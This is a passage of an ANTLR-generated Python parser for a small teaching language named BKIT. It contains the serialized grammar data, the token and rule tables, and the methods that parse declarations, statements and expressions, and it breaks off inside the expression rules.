buf.write(\"\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7Q\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\3\\b\")\n buf.write(\"\\3\\t\\3\\t\\3\\t\\7\\t\\\\\\n\\t\\f\\t\\16\\t_\\13\\t\\3\\t\\3\\t\\3\\n\\3\\n\")\n buf.write(\"\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\7\\13l\\n\\13\\f\\13\\16\")\n buf.write(\"\\13o\\13\\13\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\r\\5\\rx\\n\\r\\3\\16\\3\")\n buf.write(\"\\16\\3\\16\\3\\16\\3\\16\\3\\16\\7\\16\\u0080\\n\\16\\f\\16\\16\\16\\u0083\")\n buf.write(\"\\13\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u008e\\n\\17\\f\\17\\16\\17\\u0091\\13\\17\\3\\20\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u009c\\n\\21\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\7\\22\\u00a1\\n\\22\\f\\22\\16\\22\\u00a4\\13\\22\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\2\\5\\24\\32\\34\\24\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\")\n buf.write(\"\\34\\36 \\\"$\\2\\3\\3\\2\\7\\b\\2\\u00a8\\2(\\3\\2\\2\\2\\4.\\3\\2\\2\\2\\6\")\n buf.write(\"\\61\\3\\2\\2\\2\\bG\\3\\2\\2\\2\\nJ\\3\\2\\2\\2\\fP\\3\\2\\2\\2\\16T\\3\\2\\2\")\n buf.write(\"\\2\\20X\\3\\2\\2\\2\\22b\\3\\2\\2\\2\\24e\\3\\2\\2\\2\\26p\\3\\2\\2\\2\\30\")\n buf.write(\"w\\3\\2\\2\\2\\32y\\3\\2\\2\\2\\34\\u0084\\3\\2\\2\\2\\36\\u0092\\3\\2\\2\")\n buf.write(\"\\2 \\u009b\\3\\2\\2\\2\\\"\\u009d\\3\\2\\2\\2$\\u00a5\\3\\2\\2\\2&)\\5\\4\")\n buf.write(\"\\3\\2\\')\\5\\6\\4\\2(&\\3\\2\\2\\2(\\'\\3\\2\\2\\2)*\\3\\2\\2\\2*(\\3\\2\\2\")\n buf.write(\"\\2*+\\3\\2\\2\\2+,\\3\\2\\2\\2,-\\7\\2\\2\\3-\\3\\3\\2\\2\\2./\\5\\n\\6\\2\")\n buf.write(\"/\\60\\7\\25\\2\\2\\60\\5\\3\\2\\2\\2\\61\\62\\5$\\23\\2\\62\\63\\7\\30\\2\")\n buf.write(\"\\2\\63<\\7\\r\\2\\2\\649\\5\\n\\6\\2\\65\\66\\7\\25\\2\\2\\668\\5\\n\\6\\2\")\n buf.write(\"\\67\\65\\3\\2\\2\\28;\\3\\2\\2\\29\\67\\3\\2\\2\\29:\\3\\2\\2\\2:=\\3\\2\\2\")\n buf.write(\"\\2;9\\3\\2\\2\\2<\\64\\3\\2\\2\\2<=\\3\\2\\2\\2=>\\3\\2\\2\\2>?\\7\\16\\2\")\n buf.write(\"\\2?@\\7\\21\\2\\2@A\\5\\b\\5\\2AB\\7\\22\\2\\2B\\7\\3\\2\\2\\2CF\\5\\4\\3\")\n buf.write(\"\\2DF\\5\\f\\7\\2EC\\3\\2\\2\\2ED\\3\\2\\2\\2FI\\3\\2\\2\\2GE\\3\\2\\2\\2G\")\n buf.write(\"H\\3\\2\\2\\2H\\t\\3\\2\\2\\2IG\\3\\2\\2\\2JK\\5$\\23\\2KL\\5\\\"\\22\\2L\\13\")\n buf.write(\"\\3\\2\\2\\2MQ\\5\\16\\b\\2NQ\\5\\20\\t\\2OQ\\5\\22\\n\\2PM\\3\\2\\2\\2PN\")\n buf.write(\"\\3\\2\\2\\2PO\\3\\2\\2\\2QR\\3\\2\\2\\2RS\\7\\25\\2\\2S\\r\\3\\2\\2\\2TU\\7\")\n buf.write(\"\\30\\2\\2UV\\7\\27\\2\\2VW\\5\\26\\f\\2W\\17\\3\\2\\2\\2XY\\7\\30\\2\\2Y\")\n buf.write(\"]\\7\\r\\2\\2Z\\\\\\5\\24\\13\\2[Z\\3\\2\\2\\2\\\\_\\3\\2\\2\\2][\\3\\2\\2\\2\")\n buf.write(\"]^\\3\\2\\2\\2^`\\3\\2\\2\\2_]\\3\\2\\2\\2`a\\7\\16\\2\\2a\\21\\3\\2\\2\\2\")\n buf.write(\"bc\\7\\6\\2\\2cd\\5\\26\\f\\2d\\23\\3\\2\\2\\2ef\\b\\13\\1\\2fg\\5\\26\\f\")\n buf.write(\"\\2gm\\3\\2\\2\\2hi\\f\\3\\2\\2ij\\7\\26\\2\\2jl\\5\\26\\f\\2kh\\3\\2\\2\\2\")\n buf.write(\"lo\\3\\2\\2\\2mk\\3\\2\\2\\2mn\\3\\2\\2\\2n\\25\\3\\2\\2\\2om\\3\\2\\2\\2p\")\n buf.write(\"q\\5\\30\\r\\2q\\27\\3\\2\\2\\2rs\\5\\32\\16\\2st\\7\\t\\2\\2tu\\5\\30\\r\")\n buf.write(\"\\2ux\\3\\2\\2\\2vx\\5\\32\\16\\2wr\\3\\2\\2\\2wv\\3\\2\\2\\2x\\31\\3\\2\\2\")\n buf.write(\"\\2yz\\b\\16\\1\\2z{\\5\\34\\17\\2{\\u0081\\3\\2\\2\\2|}\\f\\4\\2\\2}~\\7\")\n buf.write(\"\\n\\2\\2~\\u0080\\5\\32\\16\\5\\177|\\3\\2\\2\\2\\u0080\\u0083\\3\\2\\2\")\n buf.write(\"\\2\\u0081\\177\\3\\2\\2\\2\\u0081\\u0082\\3\\2\\2\\2\\u0082\\33\\3\\2\")\n buf.write(\"\\2\\2\\u0083\\u0081\\3\\2\\2\\2\\u0084\\u0085\\b\\17\\1\\2\\u0085\\u0086\")\n buf.write(\"\\5 \\21\\2\\u0086\\u008f\\3\\2\\2\\2\\u0087\\u0088\\f\\5\\2\\2\\u0088\")\n buf.write(\"\\u0089\\7\\f\\2\\2\\u0089\\u008e\\5 \\21\\2\\u008a\\u008b\\f\\4\\2\\2\")\n buf.write(\"\\u008b\\u008c\\7\\13\\2\\2\\u008c\\u008e\\5 \\21\\2\\u008d\\u0087\")\n buf.write(\"\\3\\2\\2\\2\\u008d\\u008a\\3\\2\\2\\2\\u008e\\u0091\\3\\2\\2\\2\\u008f\")\n buf.write(\"\\u008d\\3\\2\\2\\2\\u008f\\u0090\\3\\2\\2\\2\\u0090\\35\\3\\2\\2\\2\\u0091\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\u0092\\u0093\\7\\r\\2\\2\\u0093\\u0094\\5\\26\\f\")\n buf.write(\"\\2\\u0094\\u0095\\7\\16\\2\\2\\u0095\\37\\3\\2\\2\\2\\u0096\\u009c\\7\")\n buf.write(\"\\3\\2\\2\\u0097\\u009c\\7\\4\\2\\2\\u0098\\u009c\\7\\30\\2\\2\\u0099\")\n buf.write(\"\\u009c\\5\\20\\t\\2\\u009a\\u009c\\5\\36\\20\\2\\u009b\\u0096\\3\\2\")\n buf.write(\"\\2\\2\\u009b\\u0097\\3\\2\\2\\2\\u009b\\u0098\\3\\2\\2\\2\\u009b\\u0099\")\n buf.write(\"\\3\\2\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c!\\3\\2\\2\\2\\u009d\\u00a2\")\n buf.write(\"\\7\\30\\2\\2\\u009e\\u009f\\7\\26\\2\\2\\u009f\\u00a1\\7\\30\\2\\2\\u00a0\")\n buf.write(\"\\u009e\\3\\2\\2\\2\\u00a1\\u00a4\\3\\2\\2\\2\\u00a2\\u00a0\\3\\2\\2\\2\")\n buf.write(\"\\u00a2\\u00a3\\3\\2\\2\\2\\u00a3#\\3\\2\\2\\2\\u00a4\\u00a2\\3\\2\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\t\\2\\2\\2\\u00a6%\\3\\2\\2\\2\\21(*9<EGP]mw\\u0081\")\n buf.write(\"\\u008d\\u008f\\u009b\\u00a2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'+'\", \"'-'\", \n \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \n \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_ids_list_with_type = 4\n RULE_stmt = 5\n RULE_assign_stmt = 6\n RULE_call_stmt = 7\n RULE_ret_stmt = 8\n RULE_exprs_list = 9\n RULE_expr = 10\n RULE_expr0 = 11\n RULE_expr1 = 12\n RULE_expr2 = 13\n RULE_subexpr = 14\n RULE_operand = 15\n RULE_ids_list = 16\n RULE_primitive_type = 17\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"ids_list_with_type\", \"stmt\", \"assign_stmt\", \"call_stmt\", \n \"ret_stmt\", \"exprs_list\", \"expr\", \"expr0\", \"expr1\", \"expr2\", \n \"subexpr\", \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n Integer_literal=1\n Float_literal=2\n String_literal=3\n RETURN=4\n INT=5\n FLOAT=6\n PLUS_INT=7\n MINUS_INT=8\n STAR_INT=9\n DIV_INT=10\n LEFT_PAREN=11\n RIGHT_PAREN=12\n LEFT_BRACKET=13\n RIGHT_BRACKET=14\n LEFT_BRACE=15\n RIGHT_BRACE=16\n COLON=17\n DOT=18\n SEMI=19\n COMMA=20\n ASSIGN=21\n ID=22\n ILLEGAL_ESCAPE=23\n UNCLOSE_STRING=24\n COMMENT=25\n UNTERMINATED_COMMENT=26\n ERROR_CHAR=27\n WS=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 38 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 38\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 36\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 37\n self.function_declare()\n pass\n\n\n self.state = 40 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.INT or _la==BKITParser.FLOAT):\n break\n\n self.state = 42\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ids_list_with_type(self):\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 44\n self.ids_list_with_type()\n self.state = 45\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def ids_list_with_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_list_with_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 47\n self.primitive_type()\n self.state = 48\n self.match(BKITParser.ID)\n self.state = 49\n self.match(BKITParser.LEFT_PAREN)\n self.state = 58\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.INT or _la==BKITParser.FLOAT:\n self.state = 50\n self.ids_list_with_type()\n self.state = 55\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.SEMI:\n self.state = 51\n self.match(BKITParser.SEMI)\n self.state = 52\n self.ids_list_with_type()\n self.state = 57\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 60\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 61\n self.match(BKITParser.LEFT_BRACE)\n self.state = 62\n self.function_body()\n self.state = 63\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 69\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT) | (1 << BKITParser.ID))) != 0):\n self.state = 67\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 65\n self.var_declare()\n pass\n elif token in [BKITParser.RETURN, BKITParser.ID]:\n self.state = 66\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 71\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_list_with_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list_with_type\n\n\n\n\n def ids_list_with_type(self):\n\n localctx = BKITParser.Ids_list_with_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_ids_list_with_type)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 72\n self.primitive_type()\n self.state = 73\n self.ids_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 78\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 75\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.state = 76\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.state = 77\n self.ret_stmt()\n pass\n\n\n self.state = 80\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 82\n self.match(BKITParser.ID)\n self.state = 83\n self.match(BKITParser.ASSIGN)\n self.state = 84\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def exprs_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Exprs_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Exprs_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 86\n self.match(BKITParser.ID)\n self.state = 87\n self.match(BKITParser.LEFT_PAREN)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.Integer_literal) | (1 << BKITParser.Float_literal) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.ID))) != 0):\n self.state = 88\n self.exprs_list(0)\n self.state = 93\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 94\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.RETURN)\n self.state = 97\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Exprs_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def exprs_list(self):\n return self.getTypedRuleContext(BKITParser.Exprs_listContext,0)\n\n\n def COMMA(self):\n return self.getToken(BKITParser.COMMA, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_exprs_list\n\n\n\n def exprs_list(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Exprs_listContext(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 18\n self.enterRecursionRule(localctx, 18, self.RULE_exprs_list, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.expr()\n self._ctx.stop = self._input.LT(-1)\n self.state = 107\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,8,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Exprs_listContext(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_exprs_list)\n self.state = 102\n if not self.precpred(self._ctx, 1):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 1)\")\n self.state = 103\n self.match(BKITParser.COMMA)\n self.state = 104\n self.expr() \n self.state = 109\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,8,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_expr)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 110\n self.expr0()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr0Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr0\n\n\n\n\n def expr0(self):\n\n localctx = BKITParser.Expr0Context(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_expr0)\n try:\n self.state = 117\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 112\n self.expr1(0)\n self.state = 113\n self.match(BKITParser.PLUS_INT)\n self.state = 114\n self.expr0()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 116\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 24\n self.enterRecursionRule(localctx, 24, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 120\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 127\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 122\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 123\n self.match(BKITParser.MINUS_INT)\n self.state = 124\n self.expr1(3) \n self.state = 129\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 26\n self.enterRecursionRule(localctx, 26, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 131\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 141\n 